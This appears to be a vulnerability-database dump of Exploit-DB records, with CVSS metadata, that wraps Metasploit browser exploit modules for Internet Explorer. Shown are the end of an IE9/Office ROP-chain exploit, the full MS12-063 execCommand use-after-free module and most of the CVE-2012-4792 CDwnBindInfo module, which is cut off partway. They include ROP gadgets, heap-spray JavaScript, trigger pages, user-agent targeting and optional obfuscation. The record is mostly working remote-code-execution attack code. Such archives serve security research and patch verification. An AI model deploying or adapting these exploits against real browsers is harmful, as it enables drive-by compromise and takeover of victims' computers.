esi\r\n # mov [edi+23c], ebp\r\n # mov [edi+238], ebp\r\n # mov [edi+234], ebp\r\n # pop ebp\r\n # pop ebx\r\n # ret\r\n gadgets[:pivot] = 0x51be4418\r\n\r\n when :office2010\r\n gadgets[:spray1] = 0x1a7f0020\r\n\r\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x301fff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1a41\r\n\r\n # xchg eax,esp\r\n # add eax,dword ptr [eax]\r\n # add esp,10\r\n # mov eax,esi\r\n # pop esi\r\n # pop ebp # retn 4\r\n gadgets[:pivot] = 0x51c00e64\r\n end\r\n\r\n p1 =\r\n [\r\n gadgets[:target], # Target address\r\n gadgets[:pivot] # stack pivot\r\n ].pack(\"V*\")\r\n\r\n p1 << get_payload(rop_dll)\r\n\r\n p2 =\r\n [\r\n gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\r\n ].pack(\"V*\")\r\n\r\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\r\n js_p1 = Rex::Text.to_unescape(p1)\r\n js_p2 = Rex::Text.to_unescape(p2)\r\n\r\n %Q|\r\n<html>\r\n<script>\r\n#{js_property_spray}\r\n\r\nfunction loadOffice() {\r\n try{location.href='ms-help://'} catch(e){}\r\n}\r\n\r\nvar a = new Array();\r\nfunction spray() {\r\n var obj = '';\r\n for (i=0; i<20; i++) {\r\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\r\n else { obj += \"\\\\u4242\\\\u4242\"; }\r\n }\r\n obj += \"\\\\u5555\";\r\n\r\n for (i=0; i<10; i++) {\r\n var e = document.createElement(\"div\");\r\n e.className = obj;\r\n a.push(e);\r\n }\r\n\r\n var s1 = unescape(\"#{js_p1}\");\r\n sprayHeap({shellcode:s1, maxAllocs:0x300});\r\n var s2 = unescape(\"#{js_p2}\");\r\n sprayHeap({shellcode:s2, maxAllocs:0x300});\r\n}\r\n\r\nfunction hit()\r\n{\r\n var id_0 = document.createElement(\"sup\");\r\n var id_1 = document.createElement(\"audio\");\r\n\r\n document.body.appendChild(id_0);\r\n document.body.appendChild(id_1);\r\n id_1.applyElement(id_0);\r\n\r\n id_0.onlosecapture=function(e) {\r\n document.write(\"\");\r\n spray();\r\n }\r\n\r\n id_0['outerText']=\"\";\r\n id_0.setCapture();\r\n id_1.setCapture();\r\n}\r\n\r\nfor (i=0; i<20; i++) {\r\n document.createElement(\"frame\");\r\n}\r\n\r\nwindow.onload = function() {\r\n loadOffice();\r\n hit();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n unless is_win7_ie9?(agent)\r\n print_error(\"Not a suitable target: #{agent}\")\r\n send_not_found(cli)\r\n end\r\n\r\n html = ''\r\n if request.uri =~ /\\?dll=(\\w+)$/\r\n rop_dll = ''\r\n if $1 == 'office2007'\r\n print_status(\"Using Office 2007 ROP chain\")\r\n rop_dll = :office2007\r\n elsif $1 == 'office2010'\r\n print_status(\"Using Office 2010 ROP chain\")\r\n rop_dll = :office2010\r\n else\r\n print_error(\"Target does not have Office installed\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = get_exploit_html(cli, request, rop_dll)\r\n else\r\n print_status(\"Checking target requirements...\")\r\n html = get_preq_html(cli, request)\r\n end\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @exploit_page = \"default.html\"\r\n super\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\nhxds.dll (Microsoft\u00c2\u00ae Help Data Services Module)\r\n\r\n 2007 DLL info:\r\n ProductVersion: 2.05.50727.198\r\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\r\n\r\n 2010 DLL info:\r\n ProductVersion: 2.05.50727.4039\r\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\r\n\r\nmshtml.dll\r\n ProductVersion: 9.00.8112.16446\r\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\r\n FileDescription: Microsoft (R) HTML Viewer\r\n\r\n\r\n0:005> r\r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\r\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nMSHTML!CTreeNode::GetInterface+0xd8:\r\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\r\n\r\n\r\n66e13df7 8b0e mov ecx,dword ptr [esi]\r\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\r\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\r\n66e13e01 ffd0 call eax\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28682/"}, {"lastseen": "2016-02-02T17:24:03", "bulletinFamily": "exploit", "description": "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability. CVE-2012-4969. Remote exploit for windows platform", "modified": "2012-10-10T00:00:00", "published": "2012-10-10T00:00:00", "id": "EDB-ID:21840", "href": "https://www.exploit-db.com/exploits/21840/", "type": "exploitdb", "title": "Microsoft Internet Explorer - execCommand Use-After-Free Vulnerability MS12-063", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => \"7.0\",\r\n\t\t:ua_maxver => \"9.0\",\r\n\t\t:javascript => true,\r\n\t\t:rank => GoodRanking\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability \",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When\r\n\t\t\t\trendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,\r\n\t\t\t\tbut the same memory is reused again later in the CMshtmlEd::Exec() function, leading\r\n\t\t\t\tto a use-after-free condition.\r\n\r\n\t\t\t\tPlease note that this vulnerability has been exploited in the wild since Sep 14 2012.\r\n\r\n\t\t\t\tAlso note that presently, this module has some target dependencies for the ROP chain to be\r\n\t\t\t\tvalid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).\r\n\t\t\t\tFor Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which\r\n\t\t\t\tis often the case).\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'unknown', # via ZDI\r\n\t\t\t\t\t'eromang', # First public discovery\r\n\t\t\t\t\t'binjo',\r\n\t\t\t\t\t'sinn3r', # Metasploit\r\n\t\t\t\t\t'juan vazquez' # Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4969' ],\r\n\t\t\t\t\t[ 'OSVDB', '85532' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-063' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'],\r\n\t\t\t\t\t[ 'URL', 'http://metasploit.com' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],\r\n\t\t\t\t\t[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],\r\n\t\t\t\t\t[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Sep 14 2012\", # When it was spotted in the wild by eromang\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tvprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\texec_size = code.length\r\n\t\t\tstack_pivot = [\r\n\t\t\t\t0x77c4e393, # RETN\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\t0x77c15ed5, # XCHG EAX, ESP # RETN\r\n\t\t\t].pack(\"V*\")\r\n\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n\r\n\t\telse\r\n\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\texec_size = 0xffffffff - code.length + 1\r\n\t\t\tif t['Random']\r\n\t\t\t\tstack_pivot = [\r\n\t\t\t\t\t0x0c0c0c0c, # 0c0c0c08\r\n\t\t\t\t\t0x7c347f98, # RETN\r\n\t\t\t\t\t0x7c347f97, # POP EDX # RETN\r\n\t\t\t\t\t0x7c348b05 # XCHG EAX, ESP # RET\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\telse\r\n\t\t\t\tstack_pivot = [\r\n\t\t\t\t\t0x7c347f98, # RETN\r\n\t\t\t\t\t0x7c347f97, # POP EDX # RETN\r\n\t\t\t\t\t0x7c348b05 # XCHG EAX, ESP # RET\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\tend\r\n\t\t\trop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n\t\tend\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\t# Spray published by corelanc0d3r\r\n\t# Exploit writing tutorial part 11 : Heap Spraying Demystified\r\n\t# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\r\n\tdef get_random_spray(t, js_code, js_nops)\r\n\r\n\t\tspray = <<-JS\r\n\r\n\t\tfunction randomblock(blocksize)\r\n\t\t{\r\n\t\t\tvar theblock = \"\";\r\n\t\t\tfor (var i = 0; i < blocksize; i++)\r\n\t\t\t{\r\n\t\t\t\ttheblock += Math.floor(Math.random()*90)+10;\r\n\t\t\t}\r\n\t\t\treturn theblock;\r\n\t\t}\r\n\r\n\t\tfunction tounescape(block)\r\n\t\t{\r\n\t\t\tvar blocklen = block.length;\r\n\t\t\tvar unescapestr = \"\";\r\n\t\t\tfor (var i = 0; i < blocklen-1; i=i+4)\r\n\t\t\t{\r\n\t\t\t\tunescapestr += \"%u\" + block.substring(i,i+4);\r\n\t\t\t}\r\n\t\t\treturn unescapestr;\r\n\t\t}\r\n\r\n\t\tvar heap_obj = new heapLib.ie(0x10000);\r\n\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar offset_length = #{t['Offset']};\r\n\r\n\t\tfor (var i=0; i < 0x1000; i++) {\r\n\t\t\tvar padding = unescape(tounescape(randomblock(0x1000)));\r\n\t\t\twhile (padding.length < 0x1000) padding+= padding;\r\n\t\t\tvar junk_offset = padding.substring(0, offset_length);\r\n\t\t\tvar single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\r\n\t\t\twhile (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n\t\t\tsprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n\t\t\theap_obj.alloc(sprayblock);\r\n\t\t}\r\n\r\n\t\tJS\r\n\r\n\t\treturn spray\r\n\tend\r\n\r\n\tdef get_spray(t, js_code, js_nops)\r\n\t\tjs = <<-JS\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\t\tvar offset = nops.substring(0, #{t['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\t\theap_obj.gc();\r\n\r\n\t\tfor (var i=1; i < 0x300; i++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\r\n\t\tvar overflow = nops.substring(0, 10);\r\n\t\tJS\r\n\tend\r\n\r\n\r\n\tdef load_html1(cli, my_target)\r\n\t\tp = get_payload(my_target, cli)\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\r\n\t\tjs_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n\t\tif my_target['Random']\r\n\t\t\tjs = get_random_spray(my_target, js_code, js_r_nops)\r\n\t\telse\r\n\t\t\tjs = get_spray(my_target, js_code, js_nops)\r\n\t\tend\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\thtml = %Q|\r\n\t\t<html>\r\n\t\t\t<body>\r\n\t\t\t\t<script>\r\n\t\t\t\t\tvar arrr = new Array();\r\n\t\t\t\t\tarrr[0] = window.document.createElement(\"img\");\r\n\t\t\t\t\tarrr[0][\"src\"] = \"#{Rex::Text.rand_text_alpha(1)}\";\r\n\t\t\t\t</script>\r\n\r\n\t\t\t\t<iframe src=\"#{this_resource}/#{@html2_name}\"></iframe>\r\n\t\t\t\t<script>\r\n\t\t\t\t\t#{js}\r\n\t\t\t\t</script>\r\n\t\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef load_html2\r\n\t\thtml = %Q|\r\n\t\t<HTML>\r\n\t\t\t<script>\r\n\t\t\t\tfunction funcB() {\r\n\t\t\t\t\tdocument.execCommand(\"selectAll\");\r\n\t\t\t\t};\r\n\r\n\t\t\t\tfunction funcA() {\r\n\t\t\t\t\tdocument.write(\"#{Rex::Text.rand_text_alpha(1)}\");\r\n\t\t\t\t\tparent.arrr[0].src = \"YMjf\\\\u0c08\\\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH\";\r\n\t\t\t\t}\r\n\r\n\t\t\t</script>\r\n\t\t\t<body onload='funcB();' onselect='funcA()'>\r\n\t\t\t\t<div contenteditable='true'>\r\n\t\t\t\t\ta\r\n\t\t\t\t</div>\r\n\t\t\t</body>\r\n\t\t</HTML>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef this_resource\r\n\t\tr = get_resource\r\n\t\treturn ( r == '/') ? '' : r\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\turi = request.uri\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\tvprint_status(\"Requesting: #{uri}\")\r\n\t\tprint_status(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending a 404: #{agent.to_s}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif uri =~ /#{@html2_name}/\r\n\t\t\tprint_status(\"Loading #{@html2_name}\")\r\n\t\t\thtml = load_html2\r\n\t\telsif uri =~ /#{@html1_name}/\r\n\t\t\tprint_status(\"Loading #{@html1_name}\")\r\n\t\t\thtml = load_html1(cli, my_target)\r\n\t\telsif uri =~ /\\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)\r\n\t\t\tprint_status(\"Redirecting to #{@html1_name}\")\r\n\t\t\tsend_redirect(cli, \"#{this_resource}/#{@html1_name}\")\r\n\t\t\treturn\r\n\t\telse\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@html1_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\r\n\t\t@html2_name = \"#{Rex::Text.rand_text_alpha(6)}.html\"\r\n\t\tsuper\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n0:008> r\r\neax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08\r\neip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMshtmlEd::Exec+0x134:\r\n637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????\r\n\r\n0:008> u\r\nmshtml!CMshtmlEd::Exec+0x134:\r\n637d464e 8b07 mov eax,dword ptr [edi]\r\n637d4650 57 push edi\r\n637d4651 ff5008 call dword ptr [eax+8]\r\n\r\n0:008> k\r\nChildEBP RetAddr\r\n020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134\r\n020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6\r\n020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91\r\n020bc298 638ee2a9 mshtml!CDocument::Exec+0x24\r\n020bc2c0 638b167b mshtml!CBase::execCommand+0x50\r\n020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93\r\n020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149\r\n020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1\r\n020bc410 63643832 mshtml!CBase::InvokeEx+0x25\r\n020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b\r\n020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1\r\n020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20\r\n020bc520 633a6d37 mshtml!PlainInvokeEx+0xea\r\n020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\r\n020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\r\n020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98\r\n020bc690 633a77ff jscript!VAR::InvokeByName+0x135\r\n020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\r\n020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce\r\n020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989\r\n=end\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21840/"}, {"lastseen": "2016-02-02T21:44:07", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "EDB-ID:23754", "href": "https://www.exploit-db.com/exploits/23754/", "type": "exploitdb", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n\t\t\t\tuse-after-free condition occurs when a CDwnBindInfo object is freed by\r\n\t\t\t\tFollowHyperlink2, but a reference is kept in CDoc. As a result, when the reference\r\n\t\t\t\tis used again during a page reload, an invalid memory that's controllable is used,\r\n\t\t\t\tand allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 980,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie_heap_spray(my_target, p)\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Land the payload at 0x0c0c0b30\r\n\t\tjs = %Q|\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\t\tvar offset = nops.substring(0, #{my_target['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\t\theap_obj.gc();\r\n\t\tfor (var i=1; i < 0x300; i++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\t\tvar overflow = nops.substring(0, 10);\r\n\t\t|\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 